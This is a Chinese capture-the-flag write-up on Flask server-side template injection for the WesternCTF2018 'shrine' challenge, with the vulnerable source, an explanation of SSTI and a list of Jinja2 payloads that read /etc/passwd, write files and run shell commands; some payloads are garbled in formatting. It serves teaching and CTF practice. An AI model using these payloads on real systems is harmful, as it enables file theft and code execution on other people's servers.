flask之ssti [WesternCTF2018]shrine1

打开题目

整理一下,代码:

复制代码
import flask
import os

app = flask.Flask(__name__)
app.config['FLAG'] = os.environ.pop('FLAG')
@app.route('/')

def index():
    return open(__file__).read()
           @app.route('/shrine/')

def shrine(shrine):
    def safe_jinja(s):
        s = s.replace('(', '').replace(')', '')
        blacklist = ['config', 'self']
        return ''.join(['{{% set {}=None%}}'.format(c) for c in blacklist]) + s
    return flask.render_template_string(safe_jinja(shrine))
if __name__ == '__main__':
    app.run(debug=True)

知识点:

1.ssti的漏洞实质

实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题

2.flask的一些特性

flask有两种渲染方式,render_template() 和 render_template_string()。

render_template()是渲染文件的,render_template_string是渲染字符串的

使用{ { }}作为变量包裹标识符;

快速查找该引用对应的位置:

''.class.mro2.subclasses().index(file)
文件读写:

''.class.mro2.subclasses()40

//读取文件

''.class.mro2.subclasses()59.init.globals'__builtins__''file'("/etc/passwd").read()

''.class.mro2.subclasses()40("/etc/passwd").read()

将read()改为write()就可以进行写操作:

''.class.mro2.subclasses()40("/root/桌面/test.txt", "a").write("123")

复制代码

命令执行

1.利用eval进行命令执行

''.class.mro2.subclasses()59.init.globals'__builtins__''eval'('import("os").popen("whoami").read()')

2.利用commands实现命令执行

\[\].class.base.subclasses()59.init.globals'linecache'.dict.values()12.dict.values()144('whoami')}

{}.class.bases0.subclasses()59.init.globals'__builtins__''__import__'('os').popen('whoami').read()

直接将这些payload放入{ {}}中作为变量执行即可获得想要的结果

知识点参考文章:

关于flask的SSTI注入通俗易懂-腾讯云开发者社区-腾讯云

flask模板注入(ssti),一篇就够了_flask"+"ssti"+"总结-CSDN博客

相关推荐
IT_陈寒5 小时前
Java的Stream.parallel()把我CPU跑爆了,这种优化要谨慎
前端·人工智能·后端
子兮曰5 小时前
Bun 重写为 Rust:11天、64个Claude、16.5万美元,一次改变行业认知的激进实验
前端·后端·bun
子兮曰5 小时前
Node.js v26.5.0 深度解读:import Text、流式 ReadableStreamTee、以及隐藏的安全加固浪潮
前端·后端·node.js
子兮曰5 小时前
TypeScript 7.0 RC 深度解读:Go 重写完成,10 倍提速,编译器的「奇点时刻」
前端·后端·typescript
kosan5 小时前
.NET/C# 实战:我如何把登录验证码从“裸奔”改到“铜墙铁壁”
后端
飞猪~5 小时前
LangChain python 版本 第一集
开发语言·python·langchain
王中阳Go6 小时前
AI编程实践:规则 + 技能 + 子代理 + 钩子,拆解Trae AI 开发规范的完整落地范式
后端·agent·ai编程
2601_956319886 小时前
最新AI量化提效,先做可验证的小流程
人工智能·python
码事漫谈6 小时前
放下代码洁癖,享受挖坑人生
后端
_张有志_6 小时前
手撕 STL:一棵红黑树,凭什么同时撑起 set 和 map?
后端